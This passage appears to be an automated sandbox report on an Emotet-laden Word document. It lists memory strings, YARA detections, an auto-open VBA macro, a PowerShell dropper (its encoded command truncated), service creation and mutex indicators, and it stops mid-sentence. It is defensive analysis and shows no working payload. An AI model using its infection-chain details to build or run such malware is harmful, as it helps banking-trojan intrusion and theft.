Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeate4
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeatem
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeavior
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizebled
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizecher
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizecklen
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizector
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizedM
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizedd
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizedh
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizedty
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeed
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeeople
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizefCi
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizegic
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeging
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeging3
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeging_
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeion
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeionQ
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeionb
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeiond
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeize
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizel1234
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeleC
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeled
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeled#
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeled$
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeledd
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeleds
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizem
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizen
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizengUID
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizenser/
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizensgB
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizents
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeol
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeon
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizep
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizepj
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizept
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizer
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizesab
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizesrek
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeta
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizete2
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizetor
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeure
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeureo
Source: WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizev
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizevcn
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizevcsa
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizewareP
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/2
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmp | Binary or memory string: DirectDrawCreateEx

E-Banking Fraud:

Detected Emotet e-Banking trojan
Source: C:\Users\user\20.exe | Code function: 8_2_00FAB162
Source: C:\Windows\SysWOW64\sspiresize.exe | Code function: 10_2_001EB162
Emotet Banking Trojan downloader found
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enco …
Yara detected Emotet
Source: Yara match | File source: 00000008.00000002.1964883162.0000000000FA1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1960840461.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1942402576.0000000000DF1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2886137391.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1942360455.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2886079158.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1961622086.0000000000711000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1964755289.00000000007E0000.00000040.00000001.sdmp, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)
Source: C:\Users\user\20.exe | Code function: 8_2_00FA1F75 CryptAcquireContextW, CryptImportKey, LocalFree, CryptReleaseContext
Source: C:\Windows\SysWOW64\sspiresize.exe | Code function: 10_2_001E1F75 CryptAcquireContextW, CryptDecodeObjectEx, CryptImportKey, LocalFree, CryptReleaseContext

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000008.00000002.1964883162.0000000000FA1000.00000020.00000001.sdmp, type: MEMORY, Matched rule: detect Emotet in memory, Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.1960840461.00000000001E0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Emotet in memory, Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.1942402576.0000000000DF1000.00000020.00000001.sdmp, type: MEMORY, Matched rule: detect Emotet in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.2886137391.00000000001E1000.00000020.00000001.sdmp, type: MEMORY, Matched rule: detect Emotet in memory, Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.1942360455.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Emotet in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.2886079158.00000000001D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Emotet in memory, Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.1961622086.0000000000711000.00000020.00000001.sdmp, type: MEMORY, Matched rule: detect Emotet in memory, Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.1964755289.00000000007E0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Emotet in memory, Author: JPCERT/CC Incident Response Group
Document contains OLE streams with PE executables
Source: 6d2d18.msi.18.dr, Stream path '\x17163\x16689\x18229\x16446\x18156\x14988' : MZ signature found
Source: 6d2d18.msi.18.dr, Stream path '\x17163\x16689\x18229\x16446\x18156\x14988\x18175\x14598' : MZ signature found
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\20.exe
Very long command line found
Source: unknown, Process created: Commandline size = 2045
Contains functionality to delete services
Source: C:\Users\user\20.exe, Code function: 8_2_00FAB32E GetModuleFileNameW,lstrlenW,OpenServiceW,DeleteService,CloseServiceHandle
Contains functionality to launch a process as a different user
Source: C:\Users\user\20.exe, Code function: 8_2_00FA1D2B CreateProcessAsUserW,CreateProcessW
Creates files inside the system directory
Source: C:\Windows\SysWOW64\sspiresize.exe, File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache
Creates mutexes
Source: C:\Windows\SysWOW64\sspiresize.exe, Mutant created: \BaseNamedObjects\Global\I3C4E0000
Source: C:\Users\user\20.exe, Mutant created: \Sessions\1\BaseNamedObjects\Global\I3C4E0000
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4892:120:WilError_01
Source: C:\Users\user\20.exe, Mutant created: \Sessions\1\BaseNamedObjects\Global\M3C4E0000
Deletes files inside the Windows folder
Source: C:\Windows\System32\msiexec.exe, File deleted: C:\Windows\Installer\MSI3BEE.tmp
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: S_974960546330.doc, OLE, VBA macro line: Sub autoopen()
Source: VBA code instrumentation, OLE, VBA macro: Module Gyrfvjiwa, Function autoopen, Name: autoopen
Document contains embedded VBA macros
Source: S_974960546330.doc, OLE indicator, VBA macros: true
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: 6d2d18.msi.18.dr, OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Enables security privileges
Source: C:\Windows\System32\msiexec.exe, Process token adjusted: Security
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\msiexec.exe, Code function: String function: 6E9AD565 appears 114 times
Source: C:\Windows\SysWOW64\msiexec.exe, Code function: String function: 6E9DCBF6 appears 33 times
Source: C:\Windows\SysWOW64\msiexec.exe, Code function: String function: 6E9DC823 appears 196 times
Source: C:\Windows\SysWOW64\msiexec.exe, Code function: String function: 6E9DC859 appears 56 times
Source: C:\Windows\SysWOW64\msiexec.exe, Code function: String function: 6E9DC7F0 appears 166 times
Source: C:\Windows\SysWOW64\msiexec.exe, Code function: String function: 6E995D8A appears 32 times
Source: C:\Windows\SysWOW64\msiexec.exe, Code function: String function: 6E9DC062 appears 41 times
Source: C:\Windows\SysWOW64\msiexec.exe, Code function: String function: 6E99497E appears 156 times
Source: C:\Windows\SysWOW64\msiexec.exe, Code function: String function: 6E9DC88F appears 31 times
Reads the hosts file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File read: C:\Windows\System32\drivers\etc\hosts
Tries to load missing DLLs
Source: C:\Users\user\20.exe, Section loaded: wow64log.dll
Source: C:\Windows\SysWOW64\sspiresize.exe, Section loaded: wow64log.dll
Source: C:\Windows\System32\msiexec.exe, Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe, Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe, Section loaded: wow64log.dll
Source: C:\Windows\SysWOW64\msiexec.exe, Section loaded: sfc.dll
Yara signature match
Source: 00000008.00000002.1964883162.0000000000FA1000.00000020.00000001.sdmp, type: MEMORY, Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.1960840461.00000000001E0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.1942402576.0000000000DF1000.00000020.00000001.sdmp, type: MEMORY, Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.2886137391.00000000001E1000.00000020.00000001.sdmp, type: MEMORY, Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.1942360455.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.2886079158.00000000001D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.1961622086.0000000000711000.00000020.00000001.sdmp, type: MEMORY, Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.1964755289.00000000007E0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)
Source: 20.exe.5.dr, Static PE information: Section: .data ZLIB complexity 0.990749289773
Classification label
Source: classification engine, Classification label: mal100.bank.troj.expl.evad.winDOC@19/47@4/4
Contains functionality to create services
Source: C:\Users\user\20.exe, Code function: 8_2_00FAB3FE OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle
Source: C:\Windows\SysWOW64\sspiresize.exe, Code function: 10_2_001EB3FE OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle
Contains functionality to enum processes or threads
Source: C:\Users\user\20.exe, Code function: 8_2_00FA1943 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Contains functionality to instantiate COM classes
Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 27_2_6E9D03A4 __EH_prolog3_GS,CoCreateInstance,__CxxThrowException@8,_free
Contains functionality to load and extract PE file embedded resources
Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 27_2_6E9BBDF7 FindResourceW,SizeofResource,LoadResource
Contains functionality to modify services (start/stop/modify)
Source: C:\Users\user\20.exe, Code function: 8_2_00FAB3FE OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle
Creates files inside the program directory
Source: C:\Windows\System32\msiexec.exe, File created: c:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\pkeyconfig-office.xrm-ms
Creates files inside the user directory
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
Creates temporary files
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Temp\{AAB6FC61-1F7A-42D6-8FA9-2DA8F4AA3320} - OProcSessId.dat
Document contains an OLE Word Document stream indicating a Microsoft Word file
Source: S_974960546330.doc, OLE indicator, Word Document stream: true
Document contains summary information with irregular field values
Source: S_974960546330.doc, OLE document summary: edited time not present or 0
Source: 6d2d18.msi.18.dr, OLE document summary: edited time not present or 0
Parts of this applicatio